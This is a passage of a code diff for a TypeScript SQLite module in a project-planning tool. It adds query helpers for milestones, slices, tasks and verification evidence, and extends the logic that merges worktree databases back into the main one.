+      :verification_result, :duration, :completed_at, :blocker_discovered,
+      :deviations, :known_issues, :key_files, :key_decisions, :full_summary_md,
+      :description, :estimate, :files, :verify, :inputs, :expected_output, :observability_impact, :sequence
+    )
+    ON CONFLICT(milestone_id, slice_id, id) DO UPDATE SET
+      title = CASE WHEN NULLIF(:title, '') IS NOT NULL THEN :title ELSE tasks.title END,
+      status = :status,
+      one_liner = :one_liner,
+      narrative = :narrative,
+      verification_result = :verification_result,
+      duration = :duration,
+      completed_at = :completed_at,
+      blocker_discovered = :blocker_discovered,
+      deviations = :deviations,
+      known_issues = :known_issues,
+      key_files = :key_files,
+      key_decisions = :key_decisions,
+      full_summary_md = :full_summary_md,
+      description = CASE WHEN NULLIF(:description, '') IS NOT NULL THEN :description ELSE tasks.description END,
+      estimate = CASE WHEN NULLIF(:estimate, '') IS NOT NULL THEN :estimate ELSE tasks.estimate END,
+      files = CASE WHEN NULLIF(:files, '[]') IS NOT NULL THEN :files ELSE tasks.files END,
+      verify = CASE WHEN NULLIF(:verify, '') IS NOT NULL THEN :verify ELSE tasks.verify END,
+      inputs = CASE WHEN NULLIF(:inputs, '[]') IS NOT NULL THEN :inputs ELSE tasks.inputs END,
+      expected_output = CASE WHEN NULLIF(:expected_output, '[]') IS NOT NULL THEN :expected_output ELSE tasks.expected_output END,
+      observability_impact = CASE WHEN NULLIF(:observability_impact, '') IS NOT NULL THEN :observability_impact ELSE tasks.observability_impact END,
+      sequence = :sequence`,
+  ).run({
+    ":milestone_id": t.milestoneId,
+    ":slice_id": t.sliceId,
+    ":id": t.id,
+    ":title": t.title ?? "",
+    ":status": t.status ?? "pending",
+    ":one_liner": t.oneLiner ?? "",
+    ":narrative": t.narrative ?? "",
+    ":verification_result": t.verificationResult ?? "",
+    ":duration": t.duration ?? "",
+    ":completed_at": t.status === "done" || t.status === "complete" ? new Date().toISOString() : null,
+    ":blocker_discovered": t.blockerDiscovered ? 1 : 0,
+    ":deviations": t.deviations ?? "",
+    ":known_issues": t.knownIssues ?? "",
+    ":key_files": JSON.stringify(t.keyFiles ?? []),
+    ":key_decisions": JSON.stringify(t.keyDecisions ?? []),
+    ":full_summary_md": t.fullSummaryMd ?? "",
+    ":description": t.planning?.description ?? "",
+    ":estimate": t.planning?.estimate ?? "",
+    ":files": JSON.stringify(t.planning?.files ?? []),
+    ":verify": t.planning?.verify ?? "",
+    ":inputs": JSON.stringify(t.planning?.inputs ?? []),
+    ":expected_output": JSON.stringify(t.planning?.expectedOutput ?? []),
+    ":observability_impact": t.planning?.observabilityImpact ?? "",
+    ":sequence": t.sequence ?? 0,
+  });
+}
+
+export function updateTaskStatus(milestoneId: string, sliceId: string, taskId: string, status: string, completedAt?: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE tasks SET status = :status, completed_at = :completed_at
+     WHERE milestone_id = :milestone_id AND slice_id = :slice_id AND id = :id`,
+  ).run({
+    ":status": status,
+    ":completed_at": completedAt ?? null,
+    ":milestone_id": milestoneId,
+    ":slice_id": sliceId,
+    ":id": taskId,
+  });
+}
+
+export function setTaskBlockerDiscovered(milestoneId: string, sliceId: string, taskId: string, discovered: boolean): void {
+  if (!currentDb) return;
+  currentDb.prepare(
+    `UPDATE tasks SET blocker_discovered = :discovered WHERE milestone_id = :mid AND slice_id = :sid AND id = :tid`,
+  ).run({ ":discovered": discovered ? 1 : 0, ":mid": milestoneId, ":sid": sliceId, ":tid": taskId });
+}
+
+export function upsertTaskPlanning(milestoneId: string, sliceId: string, taskId: string, planning: Partial<TaskPlanningRecord>): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE tasks SET
+      title = COALESCE(:title, title),
+      description = COALESCE(:description, description),
+      estimate = COALESCE(:estimate, estimate),
+      files = COALESCE(:files, files),
+      verify = COALESCE(:verify, verify),
+      inputs = COALESCE(:inputs, inputs),
+      expected_output = COALESCE(:expected_output, expected_output),
+      observability_impact = COALESCE(:observability_impact, observability_impact),
+      full_plan_md = COALESCE(:full_plan_md, full_plan_md)
+     WHERE milestone_id = :milestone_id AND slice_id = :slice_id AND id = :id`,
+  ).run({
+    ":milestone_id": milestoneId,
+    ":slice_id": sliceId,
+    ":id": taskId,
+    ":title": planning.title ?? null,
+    ":description": planning.description ?? null,
+    ":estimate": planning.estimate ?? null,
+    ":files": planning.files ? JSON.stringify(planning.files) : null,
+    ":verify": planning.verify ?? null,
+    ":inputs": planning.inputs ? JSON.stringify(planning.inputs) : null,
+    ":expected_output": planning.expectedOutput ? JSON.stringify(planning.expectedOutput) : null,
+    ":observability_impact": planning.observabilityImpact ?? null,
+    ":full_plan_md": planning.fullPlanMd ?? null,
+  });
+}
+
+export interface SliceRow {
+  milestone_id: string;
+  id: string;
+  title: string;
+  status: string;
+  risk: string;
+  depends: string[];
+  demo: string;
+  created_at: string;
+  completed_at: string | null;
+  full_summary_md: string;
+  full_uat_md: string;
+  goal: string;
+  success_criteria: string;
+  proof_level: string;
+  integration_closure: string;
+  observability_impact: string;
+  sequence: number;
+  replan_triggered_at: string | null;
+}
+
+function rowToSlice(row: Record<string, unknown>): SliceRow {
+  return {
+    milestone_id: row["milestone_id"] as string,
+    id: row["id"] as string,
+    title: row["title"] as string,
+    status: row["status"] as string,
+    risk: row["risk"] as string,
+    depends: JSON.parse((row["depends"] as string) || "[]"),
+    demo: (row["demo"] as string) ?? "",
+    created_at: row["created_at"] as string,
+    completed_at: (row["completed_at"] as string) ?? null,
+    full_summary_md: (row["full_summary_md"] as string) ?? "",
+    full_uat_md: (row["full_uat_md"] as string) ?? "",
+    goal: (row["goal"] as string) ?? "",
+    success_criteria: (row["success_criteria"] as string) ?? "",
+    proof_level: (row["proof_level"] as string) ?? "",
+    integration_closure: (row["integration_closure"] as string) ?? "",
+    observability_impact: (row["observability_impact"] as string) ?? "",
+    sequence: (row["sequence"] as number) ?? 0,
+    replan_triggered_at: (row["replan_triggered_at"] as string) ?? null,
+  };
+}
+
+export function getSlice(milestoneId: string, sliceId: string): SliceRow | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare("SELECT * FROM slices WHERE milestone_id = :mid AND id = :sid").get({ ":mid": milestoneId, ":sid": sliceId });
+  if (!row) return null;
+  return rowToSlice(row);
+}
+
+export function updateSliceStatus(milestoneId: string, sliceId: string, status: string, completedAt?: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE slices SET status = :status, completed_at = :completed_at
+     WHERE milestone_id = :milestone_id AND id = :id`,
+  ).run({
+    ":status": status,
+    ":completed_at": completedAt ?? null,
+    ":milestone_id": milestoneId,
+    ":id": sliceId,
+  });
+}
+
+export function setTaskSummaryMd(milestoneId: string, sliceId: string, taskId: string, md: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE tasks SET full_summary_md = :md WHERE milestone_id = :mid AND slice_id = :sid AND id = :tid`,
+  ).run({ ":mid": milestoneId, ":sid": sliceId, ":tid": taskId, ":md": md });
+}
+
+export function setSliceSummaryMd(milestoneId: string, sliceId: string, summaryMd: string, uatMd: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE slices SET full_summary_md = :summary_md, full_uat_md = :uat_md WHERE milestone_id = :mid AND id = :sid`,
+  ).run({ ":mid": milestoneId, ":sid": sliceId, ":summary_md": summaryMd, ":uat_md": uatMd });
+}
+
+export interface TaskRow {
+  milestone_id: string;
+  slice_id: string;
+  id: string;
+  title: string;
+  status: string;
+  one_liner: string;
+  narrative: string;
+  verification_result: string;
+  duration: string;
+  completed_at: string | null;
+  blocker_discovered: boolean;
+  deviations: string;
+  known_issues: string;
+  key_files: string[];
+  key_decisions: string[];
+  full_summary_md: string;
+  description: string;
+  estimate: string;
+  files: string[];
+  verify: string;
+  inputs: string[];
+  expected_output: string[];
+  observability_impact: string;
+  full_plan_md: string;
+  sequence: number;
+}
+
+function rowToTask(row: Record<string, unknown>): TaskRow {
+  return {
+    milestone_id: row["milestone_id"] as string,
+    slice_id: row["slice_id"] as string,
+    id: row["id"] as string,
+    title: row["title"] as string,
+    status: row["status"] as string,
+    one_liner: row["one_liner"] as string,
+    narrative: row["narrative"] as string,
+    verification_result: row["verification_result"] as string,
+    duration: row["duration"] as string,
+    completed_at: (row["completed_at"] as string) ?? null,
+    blocker_discovered: (row["blocker_discovered"] as number) === 1,
+    deviations: row["deviations"] as string,
+    known_issues: row["known_issues"] as string,
+    key_files: JSON.parse((row["key_files"] as string) || "[]"),
+    key_decisions: JSON.parse((row["key_decisions"] as string) || "[]"),
+    full_summary_md: row["full_summary_md"] as string,
+    description: (row["description"] as string) ?? "",
+    estimate: (row["estimate"] as string) ?? "",
+    files: JSON.parse((row["files"] as string) || "[]"),
+    verify: (row["verify"] as string) ?? "",
+    inputs: JSON.parse((row["inputs"] as string) || "[]"),
+    expected_output: JSON.parse((row["expected_output"] as string) || "[]"),
+    observability_impact: (row["observability_impact"] as string) ?? "",
+    full_plan_md: (row["full_plan_md"] as string) ?? "",
+    sequence: (row["sequence"] as number) ?? 0,
+  };
+}
+
+export function getTask(milestoneId: string, sliceId: string, taskId: string): TaskRow | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare(
+    "SELECT * FROM tasks WHERE milestone_id = :mid AND slice_id = :sid AND id = :tid",
+  ).get({ ":mid": milestoneId, ":sid": sliceId, ":tid": taskId });
+  if (!row) return null;
+  return rowToTask(row);
+}
+
+export function getSliceTasks(milestoneId: string, sliceId: string): TaskRow[] {
+  if (!currentDb) return [];
+  const rows = currentDb.prepare(
+    "SELECT * FROM tasks WHERE milestone_id = :mid AND slice_id = :sid ORDER BY sequence, id",
+  ).all({ ":mid": milestoneId, ":sid": sliceId });
+  return rows.map(rowToTask);
+}
+
+export function insertVerificationEvidence(e: {
+  taskId: string;
+  sliceId: string;
+  milestoneId: string;
+  command: string;
+  exitCode: number;
+  verdict: string;
+  durationMs: number;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT OR IGNORE INTO verification_evidence (task_id, slice_id, milestone_id, command, exit_code, verdict, duration_ms, created_at)
+     VALUES (:task_id, :slice_id, :milestone_id, :command, :exit_code, :verdict, :duration_ms, :created_at)`,
+  ).run({
+    ":task_id": e.taskId,
+    ":slice_id": e.sliceId,
+    ":milestone_id": e.milestoneId,
+    ":command": e.command,
+    ":exit_code": e.exitCode,
+    ":verdict": e.verdict,
+    ":duration_ms": e.durationMs,
+    ":created_at": new Date().toISOString(),
+  });
+}
+
+export interface VerificationEvidenceRow {
+  id: number;
+  task_id: string;
+  slice_id: string;
+  milestone_id: string;
+  command: string;
+  exit_code: number;
+  verdict: string;
+  duration_ms: number;
+  created_at: string;
+}
+
+export function getVerificationEvidence(milestoneId: string, sliceId: string, taskId: string): VerificationEvidenceRow[] {
+  if (!currentDb) return [];
+  const rows = currentDb.prepare(
+    "SELECT * FROM verification_evidence WHERE milestone_id = :mid AND slice_id = :sid AND task_id = :tid ORDER BY id",
+  ).all({ ":mid": milestoneId, ":sid": sliceId, ":tid": taskId });
+  return rows as unknown as VerificationEvidenceRow[];
+}
+
+export interface MilestoneRow {
+  id: string;
+  title: string;
+  status: string;
+  depends_on: string[];
+  created_at: string;
+  completed_at: string | null;
+  vision: string;
+  success_criteria: string[];
+  key_risks: Array<{ risk: string; whyItMatters: string }>;
+  proof_strategy: Array<{ riskOrUnknown: string; retireIn: string; whatWillBeProven: string }>;
+  verification_contract: string;
+  verification_integration: string;
+  verification_operational: string;
+  verification_uat: string;
+  definition_of_done: string[];
+  requirement_coverage: string;
+  boundary_map_markdown: string;
+}
+
+function rowToMilestone(row: Record<string, unknown>): MilestoneRow {
+  return {
+    id: row["id"] as string,
+    title: row["title"] as string,
+    status: row["status"] as string,
+    depends_on: JSON.parse((row["depends_on"] as string) || "[]"),
+    created_at: row["created_at"] as string,
+    completed_at: (row["completed_at"] as string) ?? null,
+    vision: (row["vision"] as string) ?? "",
+    success_criteria: JSON.parse((row["success_criteria"] as string) || "[]"),
+    key_risks: JSON.parse((row["key_risks"] as string) || "[]"),
+    proof_strategy: JSON.parse((row["proof_strategy"] as string) || "[]"),
+    verification_contract: (row["verification_contract"] as string) ?? "",
+    verification_integration: (row["verification_integration"] as string) ?? "",
+    verification_operational: (row["verification_operational"] as string) ?? "",
+    verification_uat: (row["verification_uat"] as string) ?? "",
+    definition_of_done: JSON.parse((row["definition_of_done"] as string) || "[]"),
+    requirement_coverage: (row["requirement_coverage"] as string) ?? "",
+    boundary_map_markdown: (row["boundary_map_markdown"] as string) ?? "",
+  };
+}
+
+export interface ArtifactRow {
+  path: string;
+  artifact_type: string;
+  milestone_id: string | null;
+  slice_id: string | null;
+  task_id: string | null;
+  full_content: string;
+  imported_at: string;
+}
+
+function rowToArtifact(row: Record<string, unknown>): ArtifactRow {
+  return {
+    path: row["path"] as string,
+    artifact_type: row["artifact_type"] as string,
+    milestone_id: (row["milestone_id"] as string) ?? null,
+    slice_id: (row["slice_id"] as string) ?? null,
+    task_id: (row["task_id"] as string) ?? null,
+    full_content: row["full_content"] as string,
+    imported_at: row["imported_at"] as string,
+  };
+}
+
+export function getAllMilestones(): MilestoneRow[] {
+  if (!currentDb) return [];
+  const rows = currentDb.prepare("SELECT * FROM milestones ORDER BY id").all();
+  return rows.map(rowToMilestone);
+}
+
+export function getMilestone(id: string): MilestoneRow | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare("SELECT * FROM milestones WHERE id = :id").get({ ":id": id });
+  if (!row) return null;
+  return rowToMilestone(row);
+}
+
+/**
+ * Update a milestone's status in the database.
+ * Used by park/unpark to keep the DB in sync with the filesystem marker.
+ * See: https://github.com/gsd-build/gsd-2/issues/2694
+ */
+export function updateMilestoneStatus(milestoneId: string, status: string, completedAt?: string | null): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE milestones SET status = :status, completed_at = :completed_at WHERE id = :id`,
+  ).run({ ":status": status, ":completed_at": completedAt ?? null, ":id": milestoneId });
+}
+
+export function getActiveMilestoneFromDb(): MilestoneRow | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare(
+    "SELECT * FROM milestones WHERE status NOT IN ('complete', 'parked') ORDER BY id LIMIT 1",
+  ).get();
+  if (!row) return null;
+  return rowToMilestone(row);
+}
+
+export function getActiveSliceFromDb(milestoneId: string): SliceRow | null {
+  if (!currentDb) return null;
+
+  // Single query: find the first non-complete slice whose dependencies are all satisfied.
+  // Uses json_each() to expand the JSON depends array and checks each dep is complete.
+  const row = currentDb.prepare(
+    `SELECT s.* FROM slices s
+     WHERE s.milestone_id = :mid
+       AND s.status NOT IN ('complete', 'done', 'skipped')
+       AND NOT EXISTS (
+         SELECT 1 FROM json_each(s.depends) AS dep
+         WHERE dep.value NOT IN (
+           SELECT id FROM slices WHERE milestone_id = :mid AND status IN ('complete', 'done', 'skipped')
+         )
+       )
+     ORDER BY s.sequence, s.id
+     LIMIT 1`,
+  ).get({ ":mid": milestoneId });
+  if (!row) return null;
+  return rowToSlice(row);
+}
+
+export function getActiveTaskFromDb(milestoneId: string, sliceId: string): TaskRow | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare(
+    "SELECT * FROM tasks WHERE milestone_id = :mid AND slice_id = :sid AND status NOT IN ('complete', 'done') ORDER BY sequence, id LIMIT 1",
+  ).get({ ":mid": milestoneId, ":sid": sliceId });
+  if (!row) return null;
+  return rowToTask(row);
+}
+
+export function getMilestoneSlices(milestoneId: string): SliceRow[] {
+  if (!currentDb) return [];
+  const rows = currentDb.prepare("SELECT * FROM slices WHERE milestone_id = :mid ORDER BY sequence, id").all({ ":mid": milestoneId });
+  return rows.map(rowToSlice);
+}
+
+export function getArtifact(path: string): ArtifactRow | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare("SELECT * FROM artifacts WHERE path = :path").get({ ":path": path });
+  if (!row) return null;
+  return rowToArtifact(row);
+}
+
+// ─── Lightweight Query Variants (hot-path optimized) ─────────────────────
+
+/** Fast milestone status check — avoids deserializing JSON planning fields. */
+export function getActiveMilestoneIdFromDb(): { id: string; status: string } | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare(
+    "SELECT id, status FROM milestones WHERE status NOT IN ('complete', 'parked') ORDER BY id LIMIT 1",
+  ).get();
+  if (!row) return null;
+  return { id: row["id"] as string, status: row["status"] as string };
+}
+
+/** Fast slice status check — avoids deserializing JSON depends/planning fields. */
+export function getSliceStatusSummary(milestoneId: string): Array<{ id: string; status: string }> {
+  if (!currentDb) return [];
+  return currentDb.prepare(
+    "SELECT id, status FROM slices WHERE milestone_id = :mid ORDER BY sequence, id",
+  ).all({ ":mid": milestoneId }).map((r) => ({ id: r["id"] as string, status: r["status"] as string }));
+}
+
+/** Fast task status check — avoids deserializing JSON arrays and large text fields. */
+export function getActiveTaskIdFromDb(milestoneId: string, sliceId: string): { id: string; status: string; title: string } | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare(
+    "SELECT id, status, title FROM tasks WHERE milestone_id = :mid AND slice_id = :sid AND status NOT IN ('complete', 'done') ORDER BY sequence, id LIMIT 1",
+  ).get({ ":mid": milestoneId, ":sid": sliceId });
+  if (!row) return null;
+  return { id: row["id"] as string, status: row["status"] as string, title: row["title"] as string };
+}
+
+/** Count tasks by status for a slice — useful for progress reporting without full row load. */
+export function getSliceTaskCounts(milestoneId: string, sliceId: string): { total: number; done: number; pending: number } {
+  if (!currentDb) return { total: 0, done: 0, pending: 0 };
+  const row = currentDb.prepare(
+    `SELECT
+       COUNT(*) as total,
+       SUM(CASE WHEN status IN ('complete', 'done') THEN 1 ELSE 0 END) as done,
+       SUM(CASE WHEN status NOT IN ('complete', 'done') THEN 1 ELSE 0 END) as pending
+     FROM tasks WHERE milestone_id = :mid AND slice_id = :sid`,
+  ).get({ ":mid": milestoneId, ":sid": sliceId });
+  if (!row) return { total: 0, done: 0, pending: 0 };
+  return { total: (row["total"] as number) ?? 0, done: (row["done"] as number) ?? 0, pending: (row["pending"] as number) ?? 0 };
+}
+
+// ─── Slice Dependencies (junction table) ─────────────────────────────────
+
+/** Sync the slice_dependencies junction table from a slice's JSON depends array. */
+export function syncSliceDependencies(milestoneId: string, sliceId: string, depends: string[]): void {
+  if (!currentDb) return;
+  currentDb.prepare(
+    "DELETE FROM slice_dependencies WHERE milestone_id = :mid AND slice_id = :sid",
+  ).run({ ":mid": milestoneId, ":sid": sliceId });
+  for (const dep of depends) {
+    currentDb.prepare(
+      "INSERT OR IGNORE INTO slice_dependencies (milestone_id, slice_id, depends_on_slice_id) VALUES (:mid, :sid, :dep)",
+    ).run({ ":mid": milestoneId, ":sid": sliceId, ":dep": dep });
+  }
+}
+
+/** Get all slices that depend on a given slice. */
+export function getDependentSlices(milestoneId: string, sliceId: string): string[] {
+  if (!currentDb) return [];
+  return currentDb.prepare(
+    "SELECT slice_id FROM slice_dependencies WHERE milestone_id = :mid AND depends_on_slice_id = :sid",
+  ).all({ ":mid": milestoneId, ":sid": sliceId }).map((r) => r["slice_id"] as string);
 }
 
 // ─── Worktree DB Helpers ──────────────────────────────────────────────────
@@ -761,41 +1838,45 @@ export function copyWorktreeDb(srcDbPath: string, destDbPath: string): boolean {
     copyFileSync(srcDbPath, destDbPath);
     return true;
   } catch (err) {
-    process.stderr.write(
-      `gsd-db: failed to copy DB to worktree: ${(err as Error).message}\n`,
-    );
+    logError("db", "failed to copy DB to worktree", { error: (err as Error).message });
     return false;
   }
 }
 
+export interface ReconcileResult {
+  decisions: number;
+  requirements: number;
+  artifacts: number;
+  milestones: number;
+  slices: number;
+  tasks: number;
+  memories: number;
+  verification_evidence: number;
+  conflicts: string[];
+}
+
 export function reconcileWorktreeDb(
   mainDbPath: string,
   worktreeDbPath: string,
-): {
-  decisions: number;
-  requirements: number;
-  artifacts: number;
-  conflicts: string[];
-} {
-  const zero = {
-    decisions: 0,
-    requirements: 0,
-    artifacts: 0,
-    conflicts: [] as string[],
-  };
+): ReconcileResult {
+  const zero: ReconcileResult = { decisions: 0, requirements: 0, artifacts: 0, milestones: 0, slices: 0, tasks: 0, memories: 0, verification_evidence: 0, conflicts: [] };
   if (!existsSync(worktreeDbPath)) return zero;
-  if (worktreeDbPath.includes("'")) {
-    process.stderr.write(
-      `gsd-db: worktree DB reconciliation failed: path contains unsafe characters\n`,
-    );
+  // Guard: bail when both paths resolve to the same physical file.
+  // ATTACHing a WAL-mode DB to itself corrupts the WAL (#2823).
+  try {
+    if (realpathSync(mainDbPath) === realpathSync(worktreeDbPath)) return zero;
+  } catch (e) { logWarning("db", `realpathSync failed: ${(e as Error).message}`); }
+  // Sanitize path: reject any characters that could break ATTACH syntax.
+  // ATTACH DATABASE doesn't support parameterized paths in all providers,
+  // so we use strict allowlist validation instead.
+  if (/['";\x00]/.test(worktreeDbPath)) {
+    logError("db", "worktree DB reconciliation failed: path contains unsafe characters");
     return zero;
   }
   if (!currentDb) {
     const opened = openDatabase(mainDbPath);
     if (!opened) {
-      process.stderr.write(
-        `gsd-db: worktree DB reconciliation failed: cannot open main DB\n`,
-      );
+      logError("db", "worktree DB reconciliation failed: cannot open main DB");
       return zero;
     }
   }
@@ -804,106 +1885,408 @@ export function reconcileWorktreeDb(
   try {
     adapter.exec(`ATTACH DATABASE '${worktreeDbPath}' AS wt`);
     try {
-      // Check if attached wt database has the made_by column (legacy v3 worktrees won't)
       const wtInfo = adapter.prepare("PRAGMA wt.table_info('decisions')").all();
       const hasMadeBy = wtInfo.some((col) => col["name"] === "made_by");
 
-      const decConf = adapter
-        .prepare(
-          `SELECT m.id FROM decisions m INNER JOIN wt.decisions w ON m.id = w.id WHERE m.decision != w.decision OR m.choice != w.choice OR m.rationale != w.rationale OR ${
-            hasMadeBy ? "m.made_by != w.made_by" : "'agent' != 'agent'"
-          } OR m.superseded_by IS NOT w.superseded_by`,
-        )
-        .all();
-      for (const row of decConf)
-        conflicts.push(
-          `decision ${(row as Record<string, unknown>)["id"]}: modified in both`,
-        );
-      const reqConf = adapter
-        .prepare(
-          `SELECT m.id FROM requirements m INNER JOIN wt.requirements w ON m.id = w.id WHERE m.description != w.description OR m.status != w.status OR m.notes != w.notes OR m.superseded_by IS NOT w.superseded_by`,
-        )
-        .all();
-      for (const row of reqConf)
-        conflicts.push(
-          `requirement ${(row as Record<string, unknown>)["id"]}: modified in both`,
-        );
-      const merged = { decisions: 0, requirements: 0, artifacts: 0 };
+      const decConf = adapter.prepare(
+        `SELECT m.id FROM decisions m INNER JOIN wt.decisions w ON m.id = w.id WHERE m.decision != w.decision OR m.choice != w.choice OR m.rationale != w.rationale OR ${
+          hasMadeBy ? "m.made_by != w.made_by" : "'agent' != 'agent'"
+        } OR m.superseded_by IS NOT w.superseded_by`,
+      ).all();
+      for (const row of decConf) conflicts.push(`decision ${(row as Record<string, unknown>)["id"]}: modified in both`);
+
+      const reqConf = adapter.prepare(
+        `SELECT m.id FROM requirements m INNER JOIN wt.requirements w ON m.id = w.id WHERE m.description != w.description OR m.status != w.status OR m.notes != w.notes OR m.superseded_by IS NOT w.superseded_by`,
+      ).all();
+      for (const row of reqConf) conflicts.push(`requirement ${(row as Record<string, unknown>)["id"]}: modified in both`);
+
+      const merged: Omit<ReconcileResult, "conflicts"> = { decisions: 0, requirements: 0, artifacts: 0, milestones: 0, slices: 0, tasks: 0, memories: 0, verification_evidence: 0 };
+
+      function countChanges(result: unknown): number {
+        return typeof result === "object" && result !== null ? ((result as { changes?: number }).changes ?? 0) : 0;
+      }
+
       adapter.exec("BEGIN");
       try {
-        const dR = adapter
-          .prepare(
-            `
+        merged.decisions = countChanges(adapter.prepare(`
           INSERT OR REPLACE INTO decisions (
             id, when_context, scope, decision, choice, rationale, revisable, made_by, superseded_by
           )
-          SELECT
-            id, when_context, scope, decision, choice, rationale, revisable, ${
-              hasMadeBy ? "made_by" : "'agent'"
-            }, superseded_by
-          FROM wt.decisions
-        `,
-          )
-          .run();
-        merged.decisions =
-          typeof dR === "object" && dR !== null
-            ? ((dR as { changes?: number }).changes ?? 0)
-            : 0;
-        const rR = adapter
-          .prepare(
-            `
+          SELECT id, when_context, scope, decision, choice, rationale, revisable, ${
+            hasMadeBy ? "made_by" : "'agent'"
+          }, superseded_by FROM wt.decisions
+        `).run());
+
+        merged.requirements = countChanges(adapter.prepare(`
           INSERT OR REPLACE INTO requirements (
             id, class, status, description, why, source, primary_owner,
             supporting_slices, validation, notes, full_content, superseded_by
           )
-          SELECT
-            id, class, status, description, why, source, primary_owner,
-            supporting_slices, validation, notes, full_content, superseded_by
+          SELECT id, class, status, description, why, source, primary_owner,
+                 supporting_slices, validation, notes, full_content, superseded_by
           FROM wt.requirements
-        `,
-          )
-          .run();
-        merged.requirements =
-          typeof rR === "object" && rR !== null
-            ? ((rR as { changes?: number }).changes ?? 0)
-            : 0;
-        const aR = adapter
-          .prepare(
-            `
+        `).run());
+
+        merged.artifacts = countChanges(adapter.prepare(`
           INSERT OR REPLACE INTO artifacts (
             path, artifact_type, milestone_id, slice_id, task_id, full_content, imported_at
           )
-          SELECT
-            path, artifact_type, milestone_id, slice_id, task_id, full_content, imported_at
+          SELECT path, artifact_type, milestone_id, slice_id, task_id, full_content, imported_at
           FROM wt.artifacts
-        `,
+        `).run());
+
+        // Merge milestones — worktree may have updated status/planning fields
+        merged.milestones = countChanges(adapter.prepare(`
+          INSERT OR REPLACE INTO milestones (
+            id, title, status, depends_on, created_at, completed_at,
+            vision, success_criteria, key_risks, proof_strategy,
+            verification_contract, verification_integration, verification_operational, verification_uat,
+            definition_of_done, requirement_coverage, boundary_map_markdown
           )
-          .run();
-        merged.artifacts =
-          typeof aR === "object" && aR !== null
-            ? ((aR as { changes?: number }).changes ?? 0)
-            : 0;
+          SELECT id, title, status, depends_on, created_at, completed_at,
+                 vision, success_criteria, key_risks, proof_strategy,
+                 verification_contract, verification_integration, verification_operational, verification_uat,
+                 definition_of_done, requirement_coverage, boundary_map_markdown
+          FROM wt.milestones
+        `).run());
+
+        // Merge slices — preserve worktree progress but never downgrade completed status (#2558).
+        // Uses INSERT OR REPLACE with a subquery that picks the best status — if the main DB
+        // already has a completed slice, keep that status even if the worktree copy is stale.
+        merged.slices = countChanges(adapter.prepare(`
+          INSERT OR REPLACE INTO slices (
+            milestone_id, id, title, status, risk, depends, demo, created_at, completed_at,
+            full_summary_md, full_uat_md, goal, success_criteria, proof_level,
+            integration_closure, observability_impact, sequence, replan_triggered_at
+          )
+          SELECT w.milestone_id, w.id, w.title,
+                 CASE
+                   WHEN m.status IN ('complete', 'done') AND w.status NOT IN ('complete', 'done')
+                   THEN m.status ELSE w.status
+                 END,
+                 w.risk, w.depends, w.demo, w.created_at,
+                 CASE
+                   WHEN m.status IN ('complete', 'done') AND w.status NOT IN ('complete', 'done')
+                   THEN m.completed_at ELSE w.completed_at
+                 END,
+                 w.full_summary_md, w.full_uat_md, w.goal, w.success_criteria, w.proof_level,
+                 w.integration_closure, w.observability_impact, w.sequence, w.replan_triggered_at
+          FROM wt.slices w
+          LEFT JOIN slices m ON m.milestone_id = w.milestone_id AND m.id = w.id
+        `).run());
+
+        // Merge tasks — preserve execution results, never downgrade completed status (#2558)
+        merged.tasks = countChanges(adapter.prepare(`
+          INSERT OR REPLACE INTO tasks (
+            milestone_id, slice_id, id, title, status, one_liner, narrative,
+            verification_result, duration, completed_at, blocker_discovered,
+            deviations, known_issues, key_files, key_decisions, full_summary_md,
+            description, estimate, files, verify, inputs, expected_output,
+            observability_impact, full_plan_md, sequence
+          )
+          SELECT w.milestone_id, w.slice_id, w.id, w.title,
+                 CASE
+                   WHEN m.status IN ('complete', 'done') AND w.status NOT IN ('complete', 'done')
+                   THEN m.status ELSE w.status
+                 END,
+                 w.one_liner, w.narrative,
+                 w.verification_result, w.duration,
+                 CASE
+                   WHEN m.status IN ('complete', 'done') AND w.status NOT IN ('complete', 'done')
+                   THEN m.completed_at ELSE w.completed_at
+                 END,
+                 w.blocker_discovered,
+                 w.deviations, w.known_issues, w.key_files, w.key_decisions, w.full_summary_md,
+                 w.description, w.estimate, w.files, w.verify, w.inputs, w.expected_output,
+                 w.observability_impact, w.full_plan_md, w.sequence
+          FROM wt.tasks w
+          LEFT JOIN tasks m ON m.milestone_id = w.milestone_id AND m.slice_id = w.slice_id AND m.id = w.id
+        `).run());
+
+        // Merge memories — keep worktree-learned insights
+        merged.memories = countChanges(adapter.prepare(`
+          INSERT OR REPLACE INTO memories (
+            seq, id, category, content, confidence, source_unit_type, source_unit_id,
+            created_at, updated_at, superseded_by, hit_count
+          )
+          SELECT seq, id, category, content, confidence, source_unit_type, source_unit_id,
+                 created_at, updated_at, superseded_by, hit_count
+          FROM wt.memories
+        `).run());
+
+        // Merge verification evidence — append-only, use INSERT OR IGNORE to avoid duplicates
+        merged.verification_evidence = countChanges(adapter.prepare(`
+          INSERT OR IGNORE INTO verification_evidence (
+            task_id, slice_id, milestone_id, command, exit_code, verdict, duration_ms, created_at
+          )
+          SELECT task_id, slice_id, milestone_id, command, exit_code, verdict, duration_ms, created_at
+          FROM wt.verification_evidence
+        `).run());
+
         adapter.exec("COMMIT");
       } catch (txErr) {
-        try {
-          adapter.exec("ROLLBACK");
-        } catch {
-          /* best-effort */
-        }
